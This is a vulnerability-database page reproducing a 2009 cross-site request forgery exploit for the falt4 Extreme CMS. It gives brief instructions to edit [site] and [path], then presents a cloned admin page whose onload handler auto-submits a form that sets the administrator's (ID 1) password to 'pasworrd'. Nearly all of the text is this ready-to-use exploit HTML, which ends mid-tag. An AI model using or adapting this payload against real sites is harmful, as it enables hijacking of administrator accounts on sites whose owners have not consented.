Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Falt4 Extreme RC4,10.9.2007 XSRF Exploit

🗓️ 15 Feb 2009 00:00:00Reported by d14lType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 24 Views

falt4 Extreme RC4,10.9.2007 XSRF Exploit. falt4 cms has a CSRF vulnerability allowing attacker to change victim's password by editing [site] and [path] in code when victim clicks on it

Code
`  
#######################################  
#  
#falt4 extreme (RC4,10.9.2007) cms cross site request forgery  
########################################  
#  
#Authors:d14l and marcoj  
#######################################  
#  
#cms homepage:www.falt4.org  
#######################################  
#greetz:soul,stefo,sp1r1t,stexor,stronix,invisible,kisobran,csi and others  
#  
########################################  
  
falt4 cms suffers from csrf vulnerability which allows attacket to change victim's password  
  
  
  
you need only edit [site] and [path] in code and when victim click on it it will change its password to "pasworrd"  
  
id of admin is "1"  
  
######################################################CODE##########################################################   
</head>  
  
<body>  
  
  
<body onload="javascript:senden()">  
<div id='content_container'>  
<table width='1000' align='center' cellpadding='0' cellspacing='0' border='0' bgcolor='white'>  
<!-- header -->  
<tr>  
<td height='54'>  
<div id="helpbutton"><a href='javascript:helpflap();'><img src='gfx/themes/default_blue//help.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);" />&nbsp;</a></div>  
  
<div id='helptext'></div>  
  
<div class='logo' align="left" style='padding:0px;z-index:5;position:relative;'>  
<table width='100%' cellpadding='15' cellpadding="5">  
<tr>  
<td width='50%' align='left'>  
<img src='gfx/themes/default_blue/banners/banner.jpg' alt='faltsystem' /> <div style='position:absolute;top:65px;margin-left:70px;' id='quotes'></div>  
</td>  
<td width='50%' align='right' style='position:relative;z-index:6;'>  
  
<div style='position:relative;z-index:0;'>  
<table>  
<tr>  
<td valign='middle'>  
<img src='gfx/themes/default_blue/quickfind.gif' alt='' />  
</td>  
<td valign="middle">  
<input input type="text" class="inputfield" class="inputfield" name="query" id="query" onKeyup="sendit();">  
</td>  
  
</tr>  
</table>  
</div>  
  
  
  
<!-- SPOTLIGHT HERE -->  
</td>  
</tr>  
</table>  
  
  
</div>  
</td>  
</tr>  
<!-- banner -->  
<!-- nav -->  
<tr>  
<td>  
<table width='100%' cellpadding='0' cellspacing='0' border='0'>  
<tr>  
  
<td height='23' width="100%" style="position:relative;z-index:9;" align="right">  
<div id="menu">  
<ul id="nav">  
  
<li><a class='nav_inactive' href="index.php?handler=start"><img src='gfx/themes/default_blue/menu_icons/application_home.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);" />&nbsp;Start</a></li>  
  
  
<!-- ARTIKEL -->  
<li><a class='nav_inactive' href="index.php?handler=edit_content&action=list_articles"><img src='gfx/themes/default_blue/menu_icons/icon_article.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);" />&nbsp;Article</a></li>   
<!-- MEDIADB -->  
<li><a class='nav_inactive' href="index.php?handler=mediadb25"><img src='gfx/themes/default_blue/menu_icons/mdb-mini.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);" />&nbsp;Media DB</a></li>  
  
<!-- SEITENSTRUKTUR -->  
  
<li><a class='nav_inactive' href="index.php?handler=edit_site_structure"><img src='gfx/themes/default_blue/menu_icons/treeview.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);" />&nbsp;Structure</a></li>  
  
  
<!-- KATEGORIEN -->  
  
  
<li><a class='nav_inactive' href="index.php?handler=edit_categories&action=default"><img src='gfx/themes/default_blue/menu_icons/minicategorie_normal.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);" />&nbsp;Categories </a>   
</li>  
  
  
<!-- NAVIGATION -->  
<li><a class='nav_inactive' href='index.php?handler=edit_navigation&action=default'><img src='gfx/themes/default_blue/menu_icons/navigation.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);" />&nbsp;Navigation</a></li>  
  
<!-- MODULE -->  
  
<li><a class='nav_inactive' href='index.php?handler=edit_modules&action=default'><img src='gfx/themes/default_blue/menu_icons/icon_module.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);" />&nbsp;Module</a></li>  
  
  
  
  
<li><a class='nav_active' href='index.php?handler=edit_properties&action=default'><img src='gfx/themes/default_blue/menu_icons/site_properties.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);" />&nbsp;Administration</a>  
</li>  
<li><a class='nav_inactive' href='index.php?handler=show_statistics&action=default'><img src='gfx/themes/default_blue/menu_icons/statistics.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);" />&nbsp;Statistics</a></li>  
  
</ul>  
  
  
</div>  
</td>  
</tr>  
</table>  
</td>  
</tr>  
  
<!--engine-->  
  
<tr>  
<td class='border_top' height='440' bgcolor='white' valign='top'>  
<table width='100%' cellpadding='0' cellspacing='0' border='0'>  
<tr>  
<td width='160' valign='top'>  
<!-- aktionen -->  
<table width='160' cellpadding='0' cellspacing='0' border='0'>  
<!--spacer ueber aktionen -->  
<tr>  
  
<td width='160' height='5' valign="top">  
</td>  
</tr>  
<tr>  
<td width='160' height='272' valign="top">  
<table width='160' class='nav_left' style='border-spacing: 0px 8px;'> <tr>  
<td valign='top' width='32' height='15' align='right' ><a href='index.php?handler=manage_users&action=default'><img src='gfx/themes/default_blue/menu_icons/list.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);" />&nbsp;</a></td>  
<td valign='top' width='140' align='left' class='actions'><a href='index.php?handler=manage_users&action=default'>Listview</a></td> </tr> <tr>  
  
<td valign='top' width='32' height='15' align='right' ><a href='index.php?handler=manage_users&action=add_choose'><img src='gfx/themes/default_blue/menu_icons/user_add.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);" />&nbsp;</a></td>  
<td valign='top' width='140' align='left' class='actions'><a href='index.php?handler=manage_users&action=add_choose'>Add User</a></td> </tr> <tr>  
<td valign='top' width='32' height='15' align='right' ><a href='index.php?handler=manage_users&action=addgroup_choose'><img src='gfx/themes/default_blue/menu_icons/group_add.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);" />&nbsp;</a></td>  
<td valign='top' width='140' align='left' class='actions'><a href='index.php?handler=manage_users&action=addgroup_choose'>Add Group</a></td> </tr><tr><td colspan='2' class='nav_no'>&nbsp;</td></tr> <tr>  
<td valign='middle' width='32' height='25' class='action_group' align='right'><img src='gfx/themes/default_blue/menu_icons/icon_action.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);" />&nbsp;</td>  
<td width='140' align='left' style='padding-left:0px;' class='action_group' valign='middle'><b> Process</b></td> </tr> <tr>  
  
<td valign='top' width='32' height='15' align='right'><a onClick='javascript:senden()'><img src='gfx/themes/default_blue/menu_icons/save.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);" />&nbsp;</a></td>  
<td valign='top' width='140' align='left' class='actions'><a onClick='javascript:senden()'> Save</a></td> </tr> <tr>  
<td valign='top' width='32' height='15' align='right'><a onClick='javascript:history.back()'><img src='gfx/themes/default_blue/menu_icons/back.png' width='16' height='16' border='0' class='helptext' onMouseOver="helptext(this);" />&nbsp;</a></td>  
<td valign='top' width='140' align='left' class='actions'><a onClick='javascript:history.back()'> Back</a></td> </tr></table>  
</td>  
  
</tr>  
<tr>  
<td width='160' height='172' valign="bottom">  
<table width='160' cellpadding='0' cellspacing='0' border='0'>  
<tr>  
<td width='140' align='left' style='padding-left:0px;' class='action_group' valign='middle'><img src='gfx/themes/default_blue/spacer1x1.gif' width='16' height='16' alt='>' /><strong>Logged in as&nbsp; </strong></td>  
</td>  
</tr>  
  
<tr><td>  
<p style="padding-top:8px;">&nbsp;&nbsp;<img src='gfx/themes/default_blue/menu_icons/logout.png' alt='>' />&nbsp;<a href='index.php?submit=logout' style='color:#FF6600; font-weight:normal;'><strong>[Logout]</strong></a><p/>  
<p>&nbsp;&nbsp;<img src='gfx/themes/default_blue/menu_icons/site_properties.png' alt='>' />&nbsp;<a href="index.php?handler=dummy">My Profile</a></p>  
<p>&nbsp;&nbsp;<select name='backlang' onchange="window.location='http://[site]/[path]/admin/index.php?handler=manage_users&action=edit&ID=1&backlang='+this.options [this.selectedIndex].value"><option value='de' >de</option><option value='En' selected>En</option><option value='es' >es</option><option value='fr' >fr</option><option value='it' >it</option><option value='leet' >leet</option></select></p> <script language="JavaScript">  
function reload_theme()  
{  
var url = String(window.location);  
var url = url.replace(/#/g,"");  
alert(url);  
}  
</script>   
  
<p>&nbsp;&nbsp;<select name='backtheme' onchange="window.location='index.php?handler=manage_users&action=edit&ID=1&back_theme='+this.options [this.selectedIndex].value"><option value='default' selected>default</option><option value='default_blue' selected>default_blue</option></select></p> </td></tr>  
  
</table>  
</td>  
</tr>  
</table>  
</td>  
<td bgcolor="#e3e3e4" height='440'>  
<!-- enginebox -->  
<table width='100%' cellpadding='0' cellspacing='0' border='0'>  
<tr>  
  
<td width='20' height='40' valign="top">  
</td>  
<td>  
<div style="position:relative; top:0px; right:13px; text-align:right; font-size:16px; font-weight:bold; color:#999999;z-index:2;"></div>  
</td>  
</tr>  
<tr>  
<td width='20' height='40' valign="top">  
</td>  
  
<td valign='top' height='900' style="position:relative;z-index:2;">  
  
  
<div id="response_div" name="response_div"></div>  
  
<script language="JavaScript" type="text/javascript">  
function senden()  
{  
var check = chkFormular();  
if(check!=false)  
{  
document.formular.submit();   
}   
}  
function chkFormular()  
{  
  
  
if(document.formular.password.value=="")  
{  
alert('Enter a user password');  
document.formular.password.focus();  
return false;  
}  
  
  
}  
</script>  
<form action="http://[site]/[path]/admin/index.php?handler=manage_users&action=edit_now" name="formular" method="post"><table width='825' id='table_open_1'cellpadding='0' cellspacing='0' style='border:1px solid #a6978a;' class='table_block'><tr><td class='grey_title'>Account information</td></tr><tr><td class='white'><table width='100%' cellpadding='2' cellspacing='1'><tr class="title"><td colspan='2'>User properties from<i> </i>change</td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Name:</b></td><td> </td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Password:</td><td><input input type="password" class="inputfield" class="inputfield" name="password" value="pasworrd"></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Status:</td><td>Administrator</td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>eMail:</td><td><input input type="text" class="inputfield" class="inputfield" name="email" value="[email protected]"></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>ICQ:</td><td><input input type="text" class="inputfield" class="inputfield" name="icq" value="0"></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Picture:</td><td> <script type="text/javascript">   
function selectdiv()  
{  
if (document.getElementById)   
{  
var mydiv=document.getElementById('selectdiv');  
mydiv.style.display = (mydiv.style.display=='block'?'none':'block');   
}  
}  
</script>  
  
  
<input type='hidden' size='30' name='kat_ID' id='kat_ID_hidden'><table cellpadding='0' cellspacing='0'><tr><td><input type='text' class='inputfield' size='25' name='katname' id='katname' onclick='selectdiv(); this.blur();'></td><td><a onClick='selectdiv();'><img src='gfx/themes/default_blue/chooser.gif' style='cursor:pointer'></a></td></tr></table><div id='selectdiv' class='selectdiv' onClick='selectdiv();'>  
<table border='0' cellpadding='0' cellspacing='0'>  
<tr><td width='19' valign='top' style='cursor:pointer;'><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=1; document.forms[0].katname.value='/ Root'; show_kat_1();"><img src='../../../gfx/themes/default_blue/folder-closed.png'></a></td><td><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=1; document.forms[0].katname.value='/ Root'; show_kat_1();">/ Root(0)</netcms><table border='0' cellspacing='0' cellpadding='0'><tr><td valign='top' width='19'><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=5; document.forms[0].katname.value='business'; show_kat_5();"><img src='../../../gfx/themes/default_blue/folder-closed.png'></a></td><td><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=5; document.forms[0].katname.value='business'; show_kat_5();">business(3)</a></td></tr></table><table border='0' cellspacing='0' cellpadding='0'><tr><td valign='top' width='19'><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=6; document.forms[0].katname.value='business.tar'; show_kat_6();"><img src='../../../gfx/themes/default_blue/folder-closed.png'></a></td><td><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=6; document.forms[0].katname.value='business.tar'; show_kat_6();">business.tar(0)</a></td></tr></table><table border='0' cellspacing='0' cellpadding='0'><tr><td valign='top' width='19'><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=7; document.forms[0].katname.value='business.tar'; show_kat_7();"><img src='../../../gfx/themes/default_blue/folder-closed.png'></a></td><td><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=7; document.forms[0].katname.value='business.tar'; show_kat_7();">business.tar(3)</a></td></tr></table><table border='0' cellspacing='0' cellpadding='0'><tr><td valign='top' width='19'><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=4; document.forms[0].katname.value='screenshots'; show_kat_4();"><img src='../../../gfx/themes/default_blue/folder-closed.png'></a></td><td><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=4; document.forms[0].katname.value='screenshots'; show_kat_4();">screenshots(8)</a></td></tr></table><table border='0' cellspacing='0' cellpadding='0'><tr><td valign='top' width='19'><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=2; document.forms[0].katname.value='Templates'; show_kat_2();"><img src='../../../gfx/themes/default_blue/folder-closed.png'></a></td><td><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=2; document.forms[0].katname.value='Templates'; show_kat_2();">Templates(0)</a><table border='0' cellspacing='0' cellpadding='0'><tr><td valign='top' width='19'><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=3; document.forms[0].katname.value='Falt4 Extreme'; show_kat_3();"><img src='../../../gfx/themes/default_blue/folder-closed.png'></a></td><td><a style="cursor:pointer;" href="javascript:document.forms[0].kat_ID_hidden.value=3; document.forms[0].katname.value='Falt4 Extreme'; show_kat_3();">Falt4 Extreme(7)</a></td></tr></table></td></tr></table></td></tr>  
  
</table></div> <script type="text/javascript">   
  
function selectmediadiv()  
{  
if (document.getElementById)   
{  
var mydiv=document.getElementById('selectmediadiv');  
mydiv.style.display = (mydiv.style.display=='block'?'none':'block');   
}  
}  
</script>  
<input type='hidden' size='30' name='avatar' id='media_ID' value=''><table cellpadding='0' cellspacing='0'><tr><td><input type='text' class='inputfield' size='25' value='' name='medianame' id='medianame' onClick='selectmediadiv(); this.blur();'></td><td style='cursor:pointer;'><a onClick='selectmediadiv();' style='cursor:pointer;'><img style='cursor:pointer;' src='gfx/themes/default_blue/chooser.gif'></a></td></tr></table><div id='selectmediadiv' class='selectdiv' onClick='selectmediadiv();'></div><table width='153'><script language='javascript'>  
var mediadiv = document.getElementById('selectmediadiv');  
function show_kat_1(){  
mediadiv.innerHTML='';  
check(); }   
function show_kat_2(){  
mediadiv.innerHTML='';  
check(); }   
function show_kat_3(){  
mediadiv.innerHTML='<tr><td onClick="document.forms[0].medianame.value =\'apfel.jpg\'; document.forms[0].media_ID.value = \'1\';" width="153"><a onClick="document.forms[0].medianame.value =\'apfel.jpg\'; document.forms[0].media_ID.value =\'1\';" ><img src="../../../../includes/gfx/icons/jpg.gif"></a><a onClick="document.forms[0].medianame.value =\'apfel.jpg\'; document.forms[0].media_ID.value =\'1\';" ><netcms class="mediafont">apfel.jpg</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'home.gif\'; document.forms[0].media_ID.value = \'2\';" width="153"><a onClick="document.forms[0].medianame.value =\'home.gif\'; document.forms[0].media_ID.value =\'2\';" ><img src="../../../../includes/gfx/icons/gif.gif"></a><a onClick="document.forms[0].medianame.value =\'home.gif\'; document.forms[0].media_ID.value =\'2\';" ><netcms class="mediafont">home.gif</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'map\'; document.forms[0].media_ID.value = \'7\';" width="153"><a onClick="document.forms[0].medianame.value =\'map\'; document.forms[0].media_ID.value =\'7\';" ><img src="../../../../includes/gfx/icons/gif.gif"></a><a onClick="document.forms[0].medianame.value =\'map\'; document.forms[0].media_ID.value =\'7\';" ><netcms class="mediafont">map</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'modules.gif\'; document.forms[0].media_ID.value = \'3\';" width="153"><a onClick="document.forms[0].medianame.value =\'modules.gif\'; document.forms[0].media_ID.value =\'3\';" ><img src="../../../../includes/gfx/icons/gif.gif"></a><a onClick="document.forms[0].medianame.value =\'modules.gif\'; document.forms[0].media_ID.value =\'3\';" ><netcms class="mediafont">modules.gif</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'pictures.gif\'; document.forms[0].media_ID.value = \'4\';" width="153"><a onClick="document.forms[0].medianame.value =\'pictures.gif\'; document.forms[0].media_ID.value =\'4\';" ><img src="../../../../includes/gfx/icons/gif.gif"></a><a onClick="document.forms[0].medianame.value =\'pictures.gif\'; document.forms[0].media_ID.value =\'4\';" ><netcms class="mediafont">pictures.gif</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'speedmap.gif\'; document.forms[0].media_ID.value = \'5\';" width="153"><a onClick="document.forms[0].medianame.value =\'speedmap.gif\'; document.forms[0].media_ID.value =\'5\';" ><img src="../../../../includes/gfx/icons/gif.gif"></a><a onClick="document.forms[0].medianame.value =\'speedmap.gif\'; document.forms[0].media_ID.value =\'5\';" ><netcms class="mediafont">speedmap.gif</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'treasuremap.gif\'; document.forms[0].media_ID.value = \'6\';" width="153"><a onClick="document.forms[0].medianame.value =\'treasuremap.gif\'; document.forms[0].media_ID.value =\'6\';" ><img src="../../../../includes/gfx/icons/gif.gif"></a><a onClick="document.forms[0].medianame.value =\'treasuremap.gif\'; document.forms[0].media_ID.value =\'6\';" ><netcms class="mediafont">treasuremap.gif</netcms></a><br/></td></tr>';  
check(); }   
function show_kat_4(){  
mediadiv.innerHTML='<tr><td onClick="document.forms[0].medianame.value =\'Administrators Place\'; document.forms[0].media_ID.value = \'14\';" width="153"><a onClick="document.forms[0].medianame.value =\'Administrators Place\'; document.forms[0].media_ID.value =\'14\';" ><img src="../../../../includes/gfx/icons/png.gif"></a><a onClick="document.forms[0].medianame.value =\'Administrators Place\'; document.forms[0].media_ID.value =\'14\';" ><netcms class="mediafont">Administrators Place</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'Article properties\'; document.forms[0].media_ID.value = \'10\';" width="153"><a onClick="document.forms[0].medianame.value =\'Article properties\'; document.forms[0].media_ID.value =\'10\';" ><img src="../../../../includes/gfx/icons/png.gif"></a><a onClick="document.forms[0].medianame.value =\'Article properties\'; document.forms[0].media_ID.value =\'10\';" ><netcms class="mediafont">Article properties</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'Falt4 Article editing\'; document.forms[0].media_ID.value = \'11\';" width="153"><a onClick="document.forms[0].medianame.value =\'Falt4 Article editing\'; document.forms[0].media_ID.value =\'11\';" ><img src="../../../../includes/gfx/icons/png.gif"></a><a onClick="document.forms[0].medianame.value =\'Falt4 Article editing\'; document.forms[0].media_ID.value =\'11\';" ><netcms class="mediafont">Falt4 Article editing</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'Falt4 Article listing\'; document.forms[0].media_ID.value = \'9\';" width="153"><a onClick="document.forms[0].medianame.value =\'Falt4 Article listing\'; document.forms[0].media_ID.value =\'9\';" ><img src="../../../../includes/gfx/icons/png.gif"></a><a onClick="document.forms[0].medianame.value =\'Falt4 Article listing\'; document.forms[0].media_ID.value =\'9\';" ><netcms class="mediafont">Falt4 Article listing</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'Falt4 Media Database\'; document.forms[0].media_ID.value = \'12\';" width="153"><a onClick="document.forms[0].medianame.value =\'Falt4 Media Database\'; document.forms[0].media_ID.value =\'12\';" ><img src="../../../../includes/gfx/icons/png.gif"></a><a onClick="document.forms[0].medianame.value =\'Falt4 Media Database\'; document.forms[0].media_ID.value =\'12\';" ><netcms class="mediafont">Falt4 Media Database</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'Falt4 Navigation Administration\'; document.forms[0].media_ID.value = \'1\';" width="153"><a onClick="document.forms[0].medianame.value =\'Falt4 Navigation Administration\'; document.forms[0].media_ID.value =\'1\';" ><img src="../../../../includes/gfx/icons/png.gif"></a><a onClick="document.forms[0].medianame.value =\'Falt4 Navigation Administration\'; document.forms[0].media_ID.value =\'1\';" ><netcms class="mediafont">Falt4 Navigation Administration</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'Falt4 Template editor\'; document.forms[0].media_ID.value = \'15\';" width="153"><a onClick="document.forms[0].medianame.value =\'Falt4 Template editor\'; document.forms[0].media_ID.value =\'15\';" ><img src="../../../../includes/gfx/icons/png.gif"></a><a onClick="document.forms[0].medianame.value =\'Falt4 Template editor\'; document.forms[0].media_ID.value =\'15\';" ><netcms class="mediafont">Falt4 Template editor</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'Falt4 Welcome Screen\'; document.forms[0].media_ID.value = \'8\';" width="153"><a onClick="document.forms[0].medianame.value =\'Falt4 Welcome Screen\'; document.forms[0].media_ID.value =\'8\';" ><img src="../../../../includes/gfx/icons/png.gif"></a><a onClick="document.forms[0].medianame.value =\'Falt4 Welcome Screen\'; document.forms[0].media_ID.value =\'8\';" ><netcms class="mediafont">Falt4 Welcome Screen</netcms></a><br/></td></tr>';  
check(); }   
function show_kat_5(){  
mediadiv.innerHTML='<tr><td onClick="document.forms[0].medianame.value =\'1.jpg\'; document.forms[0].media_ID.value = \'16\';" width="153"><a onClick="document.forms[0].medianame.value =\'1.jpg\'; document.forms[0].media_ID.value =\'16\';" ><img src="../../../../includes/gfx/icons/jpg.gif"></a><a onClick="document.forms[0].medianame.value =\'1.jpg\'; document.forms[0].media_ID.value =\'16\';" ><netcms class="mediafont">1.jpg</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'2.jpg\'; document.forms[0].media_ID.value = \'17\';" width="153"><a onClick="document.forms[0].medianame.value =\'2.jpg\'; document.forms[0].media_ID.value =\'17\';" ><img src="../../../../includes/gfx/icons/jpg.gif"></a><a onClick="document.forms[0].medianame.value =\'2.jpg\'; document.forms[0].media_ID.value =\'17\';" ><netcms class="mediafont">2.jpg</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'3.jpg\'; document.forms[0].media_ID.value = \'18\';" width="153"><a onClick="document.forms[0].medianame.value =\'3.jpg\'; document.forms[0].media_ID.value =\'18\';" ><img src="../../../../includes/gfx/icons/jpg.gif"></a><a onClick="document.forms[0].medianame.value =\'3.jpg\'; document.forms[0].media_ID.value =\'18\';" ><netcms class="mediafont">3.jpg</netcms></a><br/></td></tr>';  
check(); }   
function show_kat_6(){  
mediadiv.innerHTML='';  
check(); }   
function show_kat_7(){  
mediadiv.innerHTML='<tr><td onClick="document.forms[0].medianame.value =\'16\'; document.forms[0].media_ID.value = \'20\';" width="153"><a onClick="document.forms[0].medianame.value =\'16\'; document.forms[0].media_ID.value =\'20\';" ><img src="../../../../includes/gfx/icons/jpeg.gif"></a><a onClick="document.forms[0].medianame.value =\'16\'; document.forms[0].media_ID.value =\'20\';" ><netcms class="mediafont">16</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'17\'; document.forms[0].media_ID.value = \'19\';" width="153"><a onClick="document.forms[0].medianame.value =\'17\'; document.forms[0].media_ID.value =\'19\';" ><img src="../../../../includes/gfx/icons/jpeg.gif"></a><a onClick="document.forms[0].medianame.value =\'17\'; document.forms[0].media_ID.value =\'19\';" ><netcms class="mediafont">17</netcms></a><br/></td></tr><tr><td onClick="document.forms[0].medianame.value =\'18\'; document.forms[0].media_ID.value = \'21\';" width="153"><a onClick="document.forms[0].medianame.value =\'18\'; document.forms[0].media_ID.value =\'21\';" ><img src="../../../../includes/gfx/icons/jpeg.gif"></a><a onClick="document.forms[0].medianame.value =\'18\'; document.forms[0].media_ID.value =\'21\';" ><netcms class="mediafont">18</netcms></a><br/></td></tr>';  
check(); }   
function check(){   
if(document.forms[0].kat_ID_hidden.value != ''){  
document.forms[0].medianame.value = 'No Media Selected';  
}} if(document.forms[0].kat_ID.value == ''){  
document.forms[0].kat_ID.value = ''; document.forms[0].katname.value = ''; show_kat_(); document.forms[0].medianame.value = ''; document.forms[0].media_ID.value = '';  
} if(document.forms[0].medianame.value == ''){  
document.forms[0].medianame.value = 'No Media Selected';  
}if(document.forms[0].katname.value == ''){document.forms[0].katname.value = 'No Kat Selected';}</script></table></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Signature:</td><td><input input type="text" class="inputfield" class="inputfield" name="signature" value=""></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>www:</td><td><input input type="text" class="inputfield" class="inputfield" name="www" value=""></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Default editor:</td><td><select name='editor'><option value="">-- Default --</option><option value='editor'>graphic editor (Word)</option><option value='html' >HTML editor</option></select></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Backend Language:</td><td><select name="backend_language"><option value="">-- Default --</option></select></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Sort by:</td><td><select name="sortfield"><option value="">-- Default --</option><option value="categorie">Category</option><option value="title">Title</option><option value="Datum">Date</option></select><select name="sort"><option value="">-- Default --</option><option value="desc">List descending(a-b-c)</option><option value="asc">List ascending (c-b-a)</option></select></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Genenral time information:</td><td><select name="timespan"><option value="">-- Default --</option><option value="1">1 Days</option><option value="2">2 Days</option><option value="3">3 Days</option><option value="4">4 Days</option><option value="5">5 Days</option><option value="6">6 Days</option><option value="7">7 Days</option><option value="8">8 Days</option><option value="9">9 Days</option><option value="10">10 Days</option><option value="11">11 Days</option><option value="12">12 Days</option><option value="13">13 Days</option><option value="14">14 Days</option><option value="15">15 Days</option><option value="16">16 Days</option><option value="17">17 Days</option><option value="18">18 Days</option><option value="19">19 Days</option><option value="20">20 Days</option><option value="21">21 Days</option><option value="22">22 Days</option><option value="23">23 Days</option><option value="24">24 Days</option><option value="25">25 Days</option><option value="26">26 Days</option><option value="27">27 Days</option><option value="28">28 Days</option><option value="29">29 Days</option><option value="30">30 Days</option><option value="31">31 Days</option></select></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Auto puplishing:</td><td><select name="publish_aut"><option value="1">Yes</option><option value="0"selected>No</option></select></td></tr><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Messages recieved from CMS:</td><td><select name="send_mail"><option value="0" selected>No</option><option value="1" >Yes</option></select><select name="level"><option value="1" selected>1 | Only messages and duties</option><option value="2" >2 | Messages & duties & publishing requestions</option><option value="3" >3 | Article changes & duties & Messages & publishing requestions</option><option value="4" >4 | All</option></select></td></tr></table></td></tr></table><br /><br /><input type="hidden" name="ID" value="1"><table width='825' id='table_open_2'cellpadding='0' cellspacing='0' style='border:1px solid #a6978a;' class='table_block'><tr><td class='grey_title'>Security Settings</td></tr><tr><td class='white'><table width='100%' cellpadding='2' cellspacing='1'><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>Secure Login:</td><td colspan='2'><input type='radio' name='restricted_login' value='1' >Yes<input type='radio' name='restricted_login' value='0' checked>No</td></tr></form><form action='index.php?handler=manage_users&action=change_ip' method='post'><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td>existing IP- Adressen:</td><td><select name='ip[]' size='5' multiple></select></td><td><input type='submit' name='bb' value='Drop selection' style='cursor:pointer;'></td></tr><input type='hidden' name='user_ID' value='1'><tr class="table_mod" onmouseover="style.backgroundColor='FFFFFF'" onmouseout="style.backgroundColor='#E8E8E8'"><td> add new IP-adress:</td><td><input type='text' class='inputfield' name='new_ip'></td><td><input type='submit' name='bb' value='add' style='cursor:pointer;'></td></tr></form></table></td></tr></table><br /><br /><table width='825' id='table_open_3'cellpadding='0' cellspacing='0' style='border:1px solid #a6978a;' class='table_block'><tr><td class='grey_title'>&nbsp;</td></tr><tr><td class='white'><table cellpadding="0" cellspacing="0"><tr><td style="cursor:pointer;" class="button_background" onclick="javascript:senden()"><font color="#FFFFFF" 